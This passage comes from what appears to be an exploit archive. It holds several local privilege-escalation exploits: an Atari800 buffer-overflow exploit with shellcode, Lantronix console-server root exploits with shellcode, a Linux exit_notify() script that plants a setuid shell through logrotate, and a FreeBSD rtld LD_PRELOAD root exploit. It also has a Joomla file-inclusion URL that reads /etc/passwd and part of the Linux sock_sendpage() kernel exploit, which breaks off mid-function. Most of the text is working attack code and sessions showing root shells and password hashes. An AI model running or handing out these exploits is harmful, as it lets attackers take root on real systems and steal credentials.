// snprintf(link+252,500,"/`perl -e \'print \"\\x01\\xee\\xff\\xbf\"x20\'` pi3");
snprintf(link+252,500,"/%s",buf);
assert(symlink(path, buf) != -1);
assert(chdir("../") != -1);
printf("\nExecuting the vuln program - %s\n\n",link);
// system(link);
execle(link,link,"pi3",0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
} else if (op2==3) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using third bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"AA");
buf_addr=(long*)&conf[2];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='\0';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can\'t create config file!\nExiting...\n");
exit(-1);
}
fprintf(fp,"OS/A_ROM=%s\n",conf);
printf("\nExecuting the vuln program - %s\n\n",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
} else if (op2==4) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using fourth bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"AA");
buf_addr=(long*)&conf[2];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='\0';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can\'t create config file!\nExiting...\n");
exit(-1);
}
fprintf(fp,"OS/B_ROM=%s\n",conf);
printf("\nExecuting the vuln program - %s\n\n",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
} else if (op2==5) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using fifth bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"A");
buf_addr=(long*)&conf[1];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='\0';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can\'t create config file!\nExiting...\n");
exit(-1);
}
fprintf(fp,"XL/XE_ROM=%s\n",conf);
printf("\nExecuting the vuln program - %s\n\n",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
} else if (op2==6) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using sixth bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"A");
buf_addr=(long*)&conf[1];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='\0';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can\'t create config file!\nExiting...\n");
exit(-1);
}
fprintf(fp,"BASIC_ROM=%s\n",conf);
printf("\nExecuting the vuln program - %s\n\n",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
}
}
// milw0rm.com [2004-11-25]
c0ntex/lantronixRoot.txt ( na)
/*
*****************************************************************************************************************
$ An open security advisory #11 - Lantronix SCS Local Root Exploits
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com || c0ntex[@]open-security.org
2: Bug Released: August 05 2005
3: Bug Impact Rate: Hi
4: Bug Scope Rate: Local
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************
SCS820/1620 - Lantronix Secure Console Server
http://www.lantronix.com
"The SCS820 and SCS1620 are members of the ActiveLinx family of secure console servers (SCS).
With ActiveLinx secure console servers, system administrators can tackle local and remote IT
incidents in record time. IT professionals gain key business advantages such as reduced time
attending problems and lowered total cost of ownership for equipment and maintenance. Secure
console servers provide a significant return on investment with faster problem solving
capabilities and higher uptime."
Multiple security issues with Lantronix Secure Console Server mean that it is trivial for a
user to become root and cause trouble on the system by abusing buffer overflows and insecure
file system configurations.
1) Insecure /tmp and pipe permissions.
2) Directory traversal allowing local users unauthorised access to underlying Linux OS.
3) Sysadmin gains local root by abusing the fact that ci does not drop root privileges.
4) All users local root via edituser using return-to-libc and generic stack smash.
Lantronix have released a fix for these issues in their latest patch, Firmware v4.4
Example 1: Overwrite root owned files
----------
[c0ntex@SCS1620 /tmp]$ ls -al
total 2
drwxrwxrwx 2 root root 1024 Oct 31 00:50 ./
drwxr-xr-x 16 root root 1024 Oct 20 11:38 ../
prw-rw-rw- 1 root root 0 Oct 31 00:14 listen_fifo_server|
[c0ntex@SCS1620 /tmp]$ mv listen_fifo_server listen_fifo_server.orig
[c0ntex@SCS1620 /tmp]$ ln -s /etc/shadow listen_fifo_server
Now user waits for system administrator to log in and do some work on the console:
sysadmin>listen 01
Please wait for connection..
sysadmin-DEVICE_01>logout
[sysadmin@SCS1620 /tmp]$ su - root
Password:
su: incorrect password # odd......
From another window:
[root@SCS1620 /tmp]# head /etc/shadow
j /tmp/listen_fifo_5226;DEVICE_0121:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
adm:*:11529:0:99999:7:::
Example 2: Directory traversal to gain access to underlying system
----------
c0ntex>?
Commands:
alias - List command aliases
cat - Print history buffer
clear - Clear port buffer
connections - show active connections
...
c0ntex>/bin/bash
/bin/bash: unknown command
c0ntex>
c0ntex>
c0ntex>../../../bin/bash
[c0ntex@SCS1620 /var/tmp]$
Example 3: Sysadmin becomes root
----------
sysadmin>
sysadmin>
sysadmin>bash
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ exit
sysadmin>../../../bin/cat /etc/shadow
root:$1$kjhfiusdhf9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
sysadmin>../../../bin/vi
~
~
~
~
~
:!cat /etc/shadow
root:$1$kjhsfsdfsdff9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
~
~
~
~
~
:q!
Run bash from the ci interface as sysadmin and from strace, we get the following:
sysadmin>bash
...
14441 [400d8367] getuid() = 500
14441 [400f775b] setresuid(ruid 4294967295, euid 500, suid 4294967295) = 0
and via directory traversal:
sysadmin> ../../../bin/bash
...
14392 [400ab367] getuid() = 500
14392 [400ab3c7] getgid() = 100
14392 [400ab397] geteuid() = 0
14392 [400ab3f7] getegid() = 100
...
sysadmin>../../../home/sysadmin/snakeoil 10719
Attached process [10719] OK!
++ Stack regsiters for PID of [10719] ++
Stack Address of %eax = [0xfffffe00]
Stack Address of %ecx = [0xbffff100]
Stack Address of %edx = [0x00000000]
Stack Address of %ebx = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of %ebp = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of %edi = [0xffffffff]
Stack Address of %eip = [0x400d79a9]
Injecting %eip register with [0xbffff2bb]
++ Stack regsiters for PID of [10719] ++
Stack Address of %eax = [0xfffffe00]
Stack Address of %ecx = [0xbffff100]
Stack Address of %edx = [0x00000000]
Stack Address of %ebx = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of %ebp = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of %edi = [0xffffffff]
Stack Address of %eip = [0xbffff2bb]
Detached process [10719] OK!
bash#
Example 4: Become root - Buffer overflow in edituser binary
The edituser binary is used to edit a users configuration parameters found in UserName.conf.
It lets you set escape sequences, server permissions and other basic user permissions and
features of the Secure Console Server.
During exploitation, edituser will strip \xff from the input, so you have to use a retaddr
that does not have the standard 0xbfff1234 type address. By creating a large pad environment
variable before running the test you can nudge your shellcode to a nice location, such as
0xbffe1234, which lets us get round this trivial obstacle. The return-to-libc method also
needs the stack nudge since the address for "/bin/sh" is stored in the environment.
[sysadmin@SCS1620 /usr/local/bin]$ ls -al edituser
-rwsr-xr-x 1 root root 12912 Apr 15 2003 edituser
[sysadmin@SCS1620 /usr/local/bin]$ su - c0ntex
Password:
bash$ cp `which edituser` . && gdb -q ./edituser
no debugging symbols found)...gdb>
gdb>
gdb>r -b `perl -e 'printf "\x41" x 70'`
escape sequence is too long.
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:00000000 ebx:00000004 ecx:4001A94B edx:4010B140 eflags:00010246
esi:0804BC0C edi:00000000 esp:BFFEC748 ebp:41414141 eip:41414141
cs:0023 ds:002B es:002B fs:0000 gs:0000 ss:002B o d I t s Z a P c
[002B:BFFEC748]---------------------------------------------------------[stack]
BFFEC778 : 28 D6 04 08 6C C9 10 40 - 70 A8 00 40 94 F8 FE BF (...l..@p..@....
BFFEC768 : 8C 9B 04 08 01 00 00 00 - 60 BC 04 08 08 BC 04 08 ........`.......
BFFEC758 : BC BC 04 08 F0 C7 FE BF - 01 00 00 00 48 F8 FE BF ............H...
BFFEC748 : 41 41 41 41 41 41 41 41 - 41 41 00 08 FF FF FF FF AAAAAAAAAA......
[002B:0804BC0C]---------------------------------------------------------[ data]
0804BC0C : 39 BA 01 40 2C BA 01 40 - 1E BA 01 40 10 BA 01 40 9..@,..@...@...@
0804BC1C : 00 00 00 00 00 00 00 00 - 03 00 00 00 00 00 00 00 ................
[0023:41414141]---------------------------------------------------------[ code]
0x41414141: Error while running hook_stop:
Error while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb> q
//return-to-libc version for non-exec-stack systems
[c0ntex@SCS1620 ~]$ id -a
uid=501(c0ntex) gid=501(c0ntex) groups=501(c0ntex)
[c0ntex@SCS1620 ~]$ export STACKPAD=`perl -e 'print "A" x 65000'`
[c0ntex@SCS1620 /home/c0ntex]$ edituser -e `perl -e 'print "A" x 56'``printf "\x70\xe6\x05\x40\x70\xe6\x05\x40\x81\xfd\xfe\xbf"`
escape sequence is too long.
bash: /bin/bash/.bashrc: Not a directory
bash#
//general stack-smash version for older boxes
#!/bin/sh
# Lantronix Secure Console Server edituser root exploit by
# c0ntex - c0ntexb@gmail.com | c0ntex@open-security.org
# Advisory @ http://www.open-security.org/advisories/11
#
# The Linux system supplied by Lantronix does not have gnu
# C compiler, so the exploit is provided as a shell script
# as such, you might need to change the address for
#
#[c0ntex@SCS1620 ~/exploit]$ sh edituserxp.sh
#
# **** *** *** *** *** *** *** *** ***
#[-] Local root exploit for edituser using return-to-libc
#[-] discovered and written by c0ntex | c0ntexb@gmail.com
#Expect a root shell :-) -> escape sequence is too long.
#bash# id -a
#uid=0(root) gid=0(root) groups=100(users),0(root),200(admin)
#bash#
#
BUFFPAD="OPEN-SECURITY.ORG**OPEN-SECURITY.ORG**OPEN-SECURITY.ORG!"
NOPSLED=`perl -e 'print "\x41" x 1000'`
RETADDR=`printf "\x74\xc2\xfe\xbf"`
SETUID=`printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80"`
SHELL=`printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"`
STACKPAD=`perl -e 'print "A" x 65000'`
VULNAP=/usr/local/bin/edituser
VULNOP="-e"
export BUFFPAD NOPSLED RETADDR SETUID SHELL STACKPAD VULNAP VULNOP
printf "\n **** *** *** *** *** *** *** *** ***\n"
printf "[-] Local root exploit for edituser\n"
printf "[-] discovered and written by c0ntex\n"
if [ -f $VULNAPP ] ; then
printf "Expect a root shell :-) -> "; sleep 1
$VULNAP $VULNOP $BUFFPAD$RETADDR$NOPSLED$SETUID$SHELL
success=$?
if [ $success -gt 0 ] ; then
printf "\nSeems something messed up, changing NOPBUF to 10000 and trying again!\n"
sleep 2
unset NOPSLED
NOPSLED=`perl -e 'print "\x41" x 10000'`
printf "Expect a root shell :-) -> "
$VULNAP $VULNOP $BUFFPAD$RETADDR$NOPSLED$SETUID$SHELL
success=$?
if [ $success -gt 0 ] ; then
printf "\nAgain it failed, sorry you are on your own now :(\n"
fi
fi
fi
EOF
Multiple Lantronix Secure Console Server local root exploits that make use of security issues allowing for unrestricted shell access.
gat3way/Linux Kernel exit_notify() Local Root ( na)
#!/bin/sh
###################################################################################
# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit
#
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0
# so you'll be out of luck most of the time.
# So it is not going to be the script kiddies' new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
####################################################################################
SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that's good!"
else
echo "No logrotate installed, sorry!";exit
fi
echo -e "Compiling the bash setuid() wrapper..."
cat >> /tmp/.m.c << EOF
#include <unistd.h>
#include <sys/types.h>
int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF
cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c
echo -e "Compiling the exploit code..."
cat >> /tmp/exploit.c << EOF
#include <stdio.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>
int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}
int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF
cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c
echo -e "Setting coredump limits and running the exploit...\n"
ulimit -c 10000
touch /tmp/.a
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex
if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi
echo "The system is not vulnerable, sorry :("
Linux Kernel versions below 2.6.29 exit_notify() local root exploit.
Kingcope/FreeBSD rtld Local Root Exploit ( na)
** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"
"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg
There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.
The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.
Example exploiting session
**********************************
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
&:/home/kcope:/bin/sh
#
Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN
*EXPLOIT*
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
FreeBSD local root exploit that leverages a bug in the Run-Time Link-Editor (rtld). Versions 7.1 and 8.0 are vulnerable.
AntiSecurity/Joomla Multiple Root Local File Inclusion ( na)
===============================================================================================================
[o] Joomla Component Multiple Root Local File Inclusion Vulnerability
Software : com_multiroot version 1.0
Vendor : http://joomlacomponent.inetlanka.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
===============================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_multiroot&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
===============================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11
===============================================================================================================
[o] April 18 2010 - GMT +07:00 Jakarta, Indonesia
The Joomla Multiple Root component version 1.0 suffers from a local file inclusion vulnerability.
Ramon de Carvalho Valle/Linux sock_sendpage() Local Root Exploit ( na)
/*
* Linux sock_sendpage() NULL pointer dereference
* Copyright 2009 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* This exploit was written to illustrate the exploitability of this
* vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
* and ppc64.
*
* This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
* The problem, first noticed by Brad Spengler, was described by Red Hat in
* Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
* the mmap_min_addr protection[2].
*
* Support for i386 and x86_64 was added for completeness. For a more complete
* implementation, refer to Brad Spengler's exploit[3], which also implements
* the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
*
* Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* are vulnerable.
*
* This exploit was tested on:
*
* CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* CentOS 5.3 (2.6.18-128.4.1.el5)
* CentOS 5.3 (2.6.18-128.2.1.el5)
* CentOS 5.3 (2.6.18-128.1.16.el5)
* CentOS 5.3 (2.6.18-128.1.14.el5)
* CentOS 5.3 (2.6.18-128.1.10.el5)
* CentOS 5.3 (2.6.18-128.1.6.el5)
* CentOS 5.3 (2.6.18-128.1.1.el5)
* CentOS 5.3 (2.6.18-128.el5)
* CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* CentOS 4.8 (2.6.9-89.0.7.EL)
* CentOS 4.8 (2.6.9-89.0.3.EL)
* CentOS 4.8 (2.6.9-89.EL)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
* SUSE Linux Enterprise Server 11 (2.6.27.19-5)
* SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
* Ubuntu 8.10 (2.6.27-14) is not vulnerable
* Ubuntu 8.10 (2.6.27-11)
* Ubuntu 8.10 (2.6.27-9)
* Ubuntu 8.10 (2.6.27-7)
*
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
*
* [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
* [2] http://kbase.redhat.com/faq/docs/DOC-18042
* [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
* [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("movq %%rsp,%0; " : "=r" (sp));
return sp;
}
#else
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("movl %%esp,%0" : "=r" (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_stack_pointer(void)
{
unsigned long sp;
asm volatile ("mr %0,%%r1; " : "=r" (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct;
asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct, thread_info;
thread_info = current_stack_pointer() & ~(4096 - 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
/*
* The TASK_RUNNING is the only possible state for a process executing
* in user-space.
*/
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
/*
* Prior to the 2.6 kernel series, the task_struct was stored at the end
* of the kernel stack.
*/
task_struct = current_stack_pointer() & ~(8192 - 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(void)
{
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 - 1);
#else
task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int
change_cred(void)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid &&
task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid &&
task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int
change_cred(void)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] &&
task_struct[0] == task_struct[2] &&
